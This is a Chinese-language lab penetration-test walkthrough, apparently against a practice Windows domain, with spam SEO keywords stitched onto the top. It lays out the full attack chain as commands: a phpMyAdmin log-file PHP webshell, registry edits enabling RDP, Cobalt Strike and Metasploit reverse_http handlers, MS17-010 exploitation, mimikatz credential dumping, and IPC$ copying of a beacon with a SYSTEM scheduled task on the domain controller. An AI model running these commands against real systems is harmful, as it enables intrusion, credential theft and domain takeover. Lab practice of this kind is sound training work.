绵阳做网站优化,网站前台需求文档,中国国防新闻,刷外链工具环境准备
靶机链接#xff1a;百度网盘 请输入提取码
提取码#xff1a;sx22
攻击机系统#xff1a;kali linux 2022.03
网络配置#xff1a; win7配置#xff1a; kali配置#xff1a; kali 192.168.1.108 192.168.111.129 桥接一块#xff0c;自定义网卡4
win7 1…
环境准备
靶机链接百度网盘 请输入提取码
提取码sx22
攻击机系统kali linux 2022.03
网络配置 win7配置 kali配置 kali 192.168.1.108 192.168.111.129 桥接一块自定义网卡4
win7 192.168.111.128 192.168.52.143 自定义网卡4自定义网卡3
win8 192.68.52.138 自定义网卡3
win2003 192.168.52.141 自定义网卡3
外网web渗透
1.用dirsearch进行目录扫描
dirsearch -u 192.168.111.128 --exclude-status 400,401,403,404,405,501,503 2.访问后发现网站绝对路径。 3.访问网址是phpmyadmin的 4.工具爆破用户名密码成功登录 5.查看是否已开启general 日志
show variables like %general%; 6.使用set global general_logon开启general 日志
开启之后数据库所有运行的日志会记录在general_log_file中 7.设置指定日志写入到网站根目录的 111.php 文件
set global general_log_file C:/phpStudy/WWW/l.php; 8.将一句话木马写入 111.php 文件中
SELECT ?php eval($_POST[cmd]);? 9.蚁剑成功连接关闭防火墙
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 10.rdesktop 192.168.111.128 远程连接成功 内网渗透
信息收集
1.开启cs,生成木马上传到蚁剑执行 2.成功上线cs.进行信息收集 3.发现一个192.168.52.143的网段 4.打印路由信息 5.查看arp信息 6.能都成功ping通52段 渗透2003
1.设置派生监听 2.将cs的shell派生(foreign)到msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129
set lport 9999
run 3.进行提权操作再进行添加路由
getsystem
run autoroute -s 192.168.52.0/24
run autoroute -p 4.设置代理
use auxiliary/server/socks_proxy
set srvhost 192.168.111.129
run 5.用ms17-010的use2进行渗透
use 2
set rhosts 192.168.52.141
run 6.成功执行whomi发现是系统权限。
set command whoami 拿下域控
信息收集
1.主机名为stu1,有四个用户 2.查看域用户
shell net user /domain 3.查看域中的主机名
shell net group domain computers /domain 4.查看域控制器主机名
shell net group domain controllers /domain
域控名字OWA$ 5.查看域控制器的主机名DNS服务器的地址
shell nslookup -typesrv _ldap._tcp ipc横向移动
1.创建一个smb监听
创建一个windows exe s 木马选择smb监听 2.run mimikakz,得到域控密码 3.建立公网主机和域控主机的ipc信任
shell net use \\192.168.52.138\ipc$ Qwer1234 /user:god\administrator 4.net use 发现建立成功后上传木马程序 6.利用ipc将木马传到域控上
shell copy beacon.exe \\192.168.52.138\c$ 7.创建计划任务并执行
shell schtasks /create /s 192.168.52.138 /tn msbtest /sc onstart /tr c:\beacon.exe /ru system /f
shell schtasks /run /s 192.168.52.138 /i /tn msbtest
/s 指定目标ip
/tn 指定计划任务名字
/sc onstart 设定开机启动
/tr 启动应用路径
/ru system 以管理员身份运行 8.link 192.168.52.138 成功上线cs执行shell whoami 管理员权限成功拿下